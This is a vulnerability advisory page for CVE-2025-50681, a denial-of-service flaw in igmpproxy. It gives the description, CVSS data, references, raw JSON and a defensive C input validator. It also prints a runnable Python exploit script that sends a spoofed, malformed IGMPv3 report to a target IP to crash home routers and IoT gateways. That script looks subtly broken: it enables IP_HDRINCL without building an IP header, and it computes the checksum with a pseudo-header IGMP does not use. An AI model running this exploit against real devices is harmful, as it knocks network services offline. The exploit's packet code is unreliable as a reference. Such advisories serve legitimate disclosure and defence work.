Security Vulnerability Report
CVE-2025-50681 CVSS 7.5 HIGH

CVE-2025-50681

Published: 2025-12-19 15:15:56
Last Modified: 2026-01-02 14:45:05

Description

igmpproxy 0.4 before commit 2b30c36 allows remote attackers to cause a denial of service (application crash) via a crafted IGMPv3 membership report packet with a malicious source address. Due to insufficient validation in the `recv_igmp()` function in src/igmpproxy.c, an invalid group record type can trigger a NULL pointer dereference when logging the address using `inet_fmtsrc()`. This vulnerability can be exploited by sending malformed multicast traffic to a host running igmpproxy, leading to a crash. igmpproxy is used in various embedded networking environments and consumer-grade IoT devices (such as home routers and media gateways) to handle multicast traffic for IPTV and other streaming services. Affected devices that rely on unpatched versions of igmpproxy may be vulnerable to remote denial-of-service attacks across a LAN.
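The kind of input validation the description says is missing, as an added example: this is not igmpproxy's code and not the upstream patch. The function name, result codes and sample buffers are assumptions made for illustration; the record layout and the valid record types 1 to 6 come from RFC 3376.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed result codes for this example (not igmpproxy identifiers). */
enum { REPORT_OK = 0, REPORT_NOT_REPORT = -1, REPORT_TRUNCATED = -2,
       REPORT_BAD_TYPE = -3, REPORT_NOT_MULTICAST = -4 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Walk every group record of an IGMPv3 Membership Report (RFC 3376, 4.2)
 * before any record is logged or acted on. buf/len is the IGMP payload,
 * i.e. the bytes after the IP header. The checksum is not verified here.
 */
int validate_igmpv3_report(const uint8_t *buf, size_t len)
{
    if (buf == NULL || len < 8)                  /* 8-byte report header */
        return REPORT_TRUNCATED;
    if (buf[0] != 0x22)                          /* not a v3 report */
        return REPORT_NOT_REPORT;
    unsigned nrec = rd16(buf + 6);               /* number of group records */
    size_t off = 8;

    for (unsigned i = 0; i < nrec; i++) {
        if (len - off < 8)                       /* fixed part of a record */
            return REPORT_TRUNCATED;
        uint8_t type = buf[off];
        size_t aux = (size_t)buf[off + 1] * 4;   /* aux data, 32-bit words */
        size_t srcs = (size_t)rd16(buf + off + 2) * 4;

        if (type < 1 || type > 6)                /* RFC 3376 defines 1..6 only; */
            return REPORT_BAD_TYPE;              /* this example drops the report */
        if ((buf[off + 4] & 0xF0) != 0xE0)       /* group must be 224.0.0.0/4 */
            return REPORT_NOT_MULTICAST;
        if (len - off - 8 < srcs + aux)          /* sources + aux must fit */
            return REPORT_TRUNCATED;
        off += 8 + srcs + aux;
    }
    return REPORT_OK;
}

/* Constructed samples: a valid one-record report and one with record type 0xFF. */
static const uint8_t sample_ok[]  = {0x22,0,0,0, 0,0,0,1, 0x04,0,0,0, 239,255,255,250};
static const uint8_t sample_bad[] = {0x22,0,0,0, 0,0,0,1, 0xFF,0,0,0, 239,255,255,250};

int main(void)
{
    return (validate_igmpv3_report(sample_ok, sizeof sample_ok) == REPORT_OK &&
            validate_igmpv3_report(sample_bad, sizeof sample_bad) == REPORT_BAD_TYPE) ? 0 : 1;
}
```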

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:pali:igmpproxy:0.4:*:*:*:*:*:*:* - VULNERABLE
igmpproxy < 0.4
igmpproxy 0.4 (before commit 2b30c36)
igmpproxy (all versions before commit 2b30c36e6ab5b21defb76ec6458ab7687984484c)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-50681 PoC - igmpproxy NULL Pointer Dereference
# Target: igmpproxy < 0.4 (before commit 2b30c36)
# Effect: Remote Denial of Service via crafted IGMPv3 membership report
import socket
import struct
import sys


def create_igmpv3_membership_report(malicious_src_ip, group_address):
    """
    Create a crafted IGMPv3 membership report packet with invalid group record type.
    This triggers NULL pointer dereference in inet_fmtsrc() function.
    """
    # IGMPv3 Membership Report packet structure
    # Type: 0x22 (IGMPv3 Membership Report)
    igmp_type = 0x22
    reserved1 = 0x00
    checksum = 0x0000  # Will be calculated later
    # Reserved field
    reserved2 = 0x0000
    # Number of group records (at least 1)
    num_group_records = 1
    # Group record - trigger NULL pointer dereference
    # Using invalid/unsupported group record type to cause the vulnerability
    record_type = 0xFF  # Invalid record type (should be 1-4)
    aux_data_len = 0x00
    num_sources = 0x0000
    # Multicast group address
    group_addr = socket.inet_aton(group_address)
    # Construct group record
    group_record = struct.pack('!BBHH', record_type, aux_data_len, num_sources, 0)[:4]
    group_record += group_addr
    # Construct IGMP header
    igmp_header = struct.pack('!BBHHH', igmp_type, reserved1, checksum, reserved2, num_group_records)
    # Full packet
    packet = igmp_header + group_record
    # Calculate and set checksum
    checksum = calculate_igmp_checksum(packet, malicious_src_ip)
    packet = packet[:2] + struct.pack('!H', checksum) + packet[4:]
    return packet


def calculate_igmp_checksum(packet, src_ip):
    """Calculate IGMP checksum for the packet."""
    # Create pseudo-header for checksum calculation
    pseudo_header = socket.inet_aton(src_ip) + socket.inet_aton('224.0.0.22') + struct.pack('!H', len(packet))
    # Combine pseudo-header with packet data
    data = pseudo_header + packet
    # Calculate checksum (16-bit one's complement)
    if len(data) % 2 == 1:
        data += b'\x00'
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) + data[i+1]
    while total > 0xFFFF:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def exploit(target_ip, malicious_src, group_address='239.255.255.250'):
    """
    Send crafted IGMPv3 packet to trigger CVE-2025-50681.

    Args:
        target_ip: IP address of the target running igmpproxy
        malicious_src: Source IP address to spoof (causes NULL pointer)
        group_address: Multicast group address
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IGMP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    packet = create_igmpv3_membership_report(malicious_src, group_address)
    print(f"[*] Sending crafted IGMPv3 Membership Report to {target_ip}")
    print(f"[*] Malicious source: {malicious_src}")
    print(f"[*] Target group: {group_address}")
    print(f"[*] Packet size: {len(packet)} bytes")
    sock.sendto(packet, (target_ip, 0))
    sock.close()
    print("[+] Packet sent successfully")
    print("[*] If vulnerable, igmpproxy should crash due to NULL pointer dereference")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <malicious_src_ip> [group_ip]")
        print(f"Example: {sys.argv[0]} 192.168.1.1 10.0.0.1")
        sys.exit(1)
    target = sys.argv[1]
    src_ip = sys.argv[2]
    group = sys.argv[3] if len(sys.argv) > 3 else "239.255.255.250"
    exploit(target, src_ip, group)
```

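References

https://gist.github.com/miora-sora/dac1612d16c45c2aedb8605478adc28f (Third Party Advisory)
https://github.com/pali/igmpproxy/issues/97 (Exploit, Patch, Issue Tracking)
https://github.com/younix/igmpproxy/commit/2b30c36e6ab5b21defb76ec6458ab7687984484c (Patch)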

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-50681", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:55.953", "lastModified": "2026-01-02T14:45:04.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "igmpproxy 0.4 before commit 2b30c36 allows remote attackers to cause a denial of service (application crash) via a crafted IGMPv3 membership report packet with a malicious source address. Due to insufficient validation in the `recv_igmp()` function in src/igmpproxy.c, an invalid group record type can trigger a NULL pointer dereference when logging the address using `inet_fmtsrc()`. This vulnerability can be exploited by sending malformed multicast traffic to a host running igmpproxy, leading to a crash. igmpproxy is used in various embedded networking environments and consumer-grade IoT devices (such as home routers and media gateways) to handle multicast traffic for IPTV and other streaming services. Affected devices that rely on unpatched versions of igmpproxy may be vulnerable to remote denial-of-service attacks across a LAN ."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pali:igmpproxy:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "54643BDE-3F80-448D-91E0-BC06F1277847"}]}]}], "references": [{"url": 
"https://gist.github.com/miora-sora/dac1612d16c45c2aedb8605478adc28f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/pali/igmpproxy/issues/97", "source": "[email protected]", "tags": ["Exploit", "Patch", "Issue Tracking"]}, {"url": "https://github.com/younix/igmpproxy/commit/2b30c36e6ab5b21defb76ec6458ab7687984484c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pali/igmpproxy/issues/97", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Issue Tracking"]}]}}